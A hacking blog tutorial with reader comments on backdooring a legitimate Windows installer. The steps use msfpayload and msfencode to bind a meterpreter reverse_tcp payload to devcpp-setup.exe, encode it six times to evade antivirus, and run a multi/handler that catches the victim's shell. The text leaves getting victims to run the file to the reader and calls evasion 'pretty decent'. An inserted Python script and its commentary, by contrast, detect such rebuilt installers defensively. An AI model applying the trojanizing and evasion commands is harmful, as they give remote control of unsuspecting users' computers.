Welcome!
How was the weekend? All good and hung over? Good! For today, a tutorial on how to backdoor any .EXE file with msfpayload. About a decade ago, when I first discovered RAT (Remote Administration Tool) programs, I had to go through various binders, cryptors and icon changers to try and successfully bind an .EXE with an exploit or malware. Finding an undetectable RAT was an even bigger problem. Of course, back then my programming skills were beyond shit, so whipping up a stable undetectable RAT was out of the question; plan B was to whip up a shitty winsock program in Visual Basic. It was a horrible, unstable program, but it was undetectable and I could bind it with the .EXE without any worry of AV detection. It did enough to get me into the victim's computer long enough to modify the AV files and upload a working, stable (detectable) RAT. Oh, fun times!
But how time flies! Thanks to the beauty that is Metasploit, we can now backdoor any .EXE file.
NOTE: This tutorial only demonstrates how to bind an .exe with a Metasploit payload. I will not be explaining ways to get your victims to execute it. Your creativity is your duty. You may download the PDF version of this tutorial here.
Let's begin:
1) Locate your .exe and place it in your Home directory as shown below.

2) To list the available payloads, type: msfpayload -l
3) As shown below, we will be using windows/meterpreter/bind_tcp.

4) Syntax to bind the file: msfpayload <payload> LHOST=<ip> LPORT=<port> R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x <.exe location> -o <output file name>
5) So in my case I would type: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=666 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x /root/devcpp-setup.exe -o /root/dedcpp-modified.exe
6) I have instructed msfpayload to bind my .exe with a meterpreter/reverse_tcp payload and msfencode to encode it 6 times with x86/shikata_ga_nai. It is also set to establish a connection back to port 666 on my machine.

7) Our newly modified file can be found in our Home directory.


8) Now that we have our modified executable ready, we will need to set up a handler to manage incoming connections from our victims. Open a fresh tab and type: msfconsole
9) To set the exploit option, type: use exploit/multi/handler
10) Set the same payload type, IP address and port number that you declared when creating your modified .EXE (refer to point 6) for LHOST and LPORT.
11) Finally, to start your handler, type: exploit
12) Now, when the .exe is run on a victim's computer (or you find a way to get them to execute it), your handler terminal will be presented with a meterpreter shell from the target's computer and access will be granted!

13) For the fun of it, I decided to scan the modified .EXE with VirusTotal. 7/41 detections, which I think is pretty decent for a standard set-up. We used x86/shikata_ga_nai to encode our file 6 times; do try encoding it with different encoder options to see various results.

14) You can list the available encoders by typing show encoders in your msfconsole terminal.
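The VirusTotal result above (7/41 on a six-pass shikata_ga_nai build) is worth looking at from the other side of the fence: what someone who has just downloaded an installer can check to tell whether it has been through this process. The Python script below is an added example written for this post; it is not code from the post or from the Metasploit project. It does two things: it compares the file's SHA-256 with the hash the vendor publishes (EXPECTED_SHA256 here is a placeholder derived from a constructed sample, not a real vendor value), and it scans for the `fnstenv [esp-0xc]` GetPC instruction (`D9 74 24 F4`) followed shortly by an x86 `loop`, which is the shape of the shikata_ga_nai decoder stub. The outermost decoder stays unencoded no matter how many `-c` passes were used, which is why a plain byte scan can still see it. The sample bytes and the decoder-shaped stub are constructed for the demonstration, not taken from a real binary.

```python
"""Triage a downloaded installer suspected of having been rebuilt with msfencode.

Added example for this post, not Metasploit code. Two checks:
  1. SHA-256 of the file versus the hash the vendor publishes (any modification,
     including a spliced-in payload, changes it).
  2. A heuristic scan for the x86/shikata_ga_nai decoder stub: fnstenv [esp-0xc]
     (D9 74 24 F4) used as a GetPC trick, followed within a few dozen bytes by an
     x86 `loop` (E2 rel8). The outermost decoder stays unencoded however many
     passes (-c) were used, so it is the part a byte scan can still see.
"""
import hashlib
import hmac
import sys

FNSTENV_ESP_MINUS_0C = b"\xd9\x74\x24\xf4"  # fnstenv [esp-0xc]
LOOP_OPCODE = 0xE2                           # loop rel8


def sha256_of(data: bytes) -> str:
    """Hex SHA-256 of the whole file contents."""
    return hashlib.sha256(data).hexdigest()


def matches_vendor_hash(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison against the vendor-published hash (case-insensitive)."""
    return hmac.compare_digest(sha256_of(data), expected_hex.strip().lower())


def find_getpc_stubs(data: bytes, window: int = 64) -> list:
    """Offsets of fnstenv [esp-0xc] that have a `loop` within `window` bytes after them."""
    hits = []
    start = 0
    stub_len = len(FNSTENV_ESP_MINUS_0C)
    while True:
        idx = data.find(FNSTENV_ESP_MINUS_0C, start)
        if idx == -1:
            return hits
        tail = data[idx + stub_len: idx + stub_len + window]
        if LOOP_OPCODE in tail:        # int-in-bytes checks for the byte value
            hits.append(idx)
        start = idx + 1


def triage(data: bytes, expected_hex: str) -> dict:
    """Combine both checks into one result dict."""
    stubs = find_getpc_stubs(data)
    hash_ok = matches_vendor_hash(data, expected_hex)
    return {
        "sha256": sha256_of(data),
        "hash_matches_vendor": hash_ok,
        "getpc_stub_offsets": stubs,
        "suspicious": (not hash_ok) or bool(stubs),
    }


# --- constructed samples (not real binaries) ---------------------------------
CLEAN_SAMPLE = b"MZ" + bytes(range(256)) * 2
# Hand-built stub with the decoder's shape: FPU instruction, fnstenv, pop, a decode
# step, pointer bump, loop. Placeholder bytes for illustration only.
DECODER_SHAPED_STUB = (
    b"\xd9\xee"                # fldz (the random FPU instruction that precedes fnstenv)
    + FNSTENV_ESP_MINUS_0C     # fnstenv [esp-0xc]
    + b"\x5b"                  # pop ebx -> address of the fldz
    + b"\x31\x4b\x1a"          # xor [ebx+0x1a], ecx
    + b"\x83\xeb\xfc"          # sub ebx, -4
    + b"\xe2\xf4"              # loop back
)
SUSPECT_SAMPLE = CLEAN_SAMPLE[:32] + DECODER_SHAPED_STUB + CLEAN_SAMPLE[32:]
# Placeholder for the hash a vendor would publish; here derived from the clean sample.
EXPECTED_SHA256 = sha256_of(CLEAN_SAMPLE)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # usage: python triage.py <installer.exe> <vendor sha256>
        with open(sys.argv[1], "rb") as fh:
            print(triage(fh.read(), sys.argv[2]))
    else:
        print("clean:  ", triage(CLEAN_SAMPLE, EXPECTED_SHA256))
        print("suspect:", triage(SUSPECT_SAMPLE, EXPECTED_SHA256))
```

The hash mismatch is the reliable signal; the stub scan is only a heuristic, since `fnstenv` is legitimate in any FPU code and other encoders produce different stubs, so treat a hit as a reason to look closer rather than a verdict. On Windows, a vendor-signed installer that has been rebuilt this way also no longer carries a valid Authenticode signature, which is the quickest check of all when a signed original exists.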

Author's Note:
1) This just demonstrates how to backdoor an exe for a local area network attack. You can easily make this an over-the-internet attack with a few tweaks to your settings (e.g. port-forwarding, modifying payload options). I will get to that in the upcoming lessons. You may download the PDF version of this tutorial here.
2) This is for educational purposes only.
3) Do NOT harm the innocent.
“Reality is just a crutch for people who can’t handle drugs.” ― Robin P. Williams
Contributed By
James
Hey James. Loving your blog, man! Keep 'em coming!
Any chance you would post a tutorial on creating your own custom exploit? I have read that by creating your own exploits you can sometimes be undetectable by AVs.
Hey Chris, glad you are enjoying it!
I will be getting to that soon. Just got a few more tutorials to upload and tick off the list. And yes, anything that is home-made (custom) will beat the AV 99.9% of the time, as it won't be in the AV .dat files for it to detect.
Usually when an exploit or virus gets too well known and notorious, its signature gets listed in the AV database, which is then sent to us users as updates. So as long as one uses the exploit/backdoor for themselves, it can stay undetectable. But some programming knowledge is necessary.
Hope all is well! And thanks again Chris!
Thanks, James, for explaining that! Are most exploits written in Python?
No worries Chris,
Exploits are a piece of data or software or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended, etc. etc. – wiki
So that means exploits can be programmed in nearly all languages, as long as you are creative enough.
For example, if there is a server running on a UNIX system, then I would use a C, Python or Ruby exploit against it because Unix understands these languages. But if I was doing a browser or web hack, then I would be better off learning Java programming, PHP, JSP and all that web-related programming stuff. The exploit language has to relate to the target language.
So basically, if you want to hack servers (which run on Unix most of the time), then you have to pick all 3 of them up, or master one and have an idea of the other two.
You need to figure out what kind of exploits suit your needs, and from there you will know which category of programming languages you will mainly need to master. I am biased towards C because I think it's the language of superior aliens.
Oh wow. Okay, I didn't realize that. Thanks again, James. Much appreciated!
Edited the last reply! Much clearer.